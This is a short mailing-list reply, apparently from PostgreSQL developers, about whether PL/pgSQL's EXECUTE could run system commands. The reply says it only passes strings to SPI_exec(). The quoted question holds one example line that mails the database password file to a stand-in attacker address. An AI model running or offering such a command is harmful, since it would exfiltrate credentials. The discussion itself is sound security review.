KuroiNeko wrote:
> > Huh? This would only be true if all operations inside plpgsql are
> > executed as superuser, which they are not. Seems to me the existing
> > defense against non-superuser using COPY is sufficient.
>
> Sorry if I missed the point, but if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to execute arbitrary code as postgres (system) user, right?
> If so, how can something like
>
> EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';
>
> be avioded?
No, EXECUTE just passes a string down to SPI_exec() without trying to prepare and save an execution plan for it.
It'snot equivalent to system(3).
Jan
--
#======================================================================#
# It's easier to get forgiveness for being wrong than for being right. #
# Let's break this rule - forgive me. #
#================================================== JanWieck@Yahoo.com #
_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
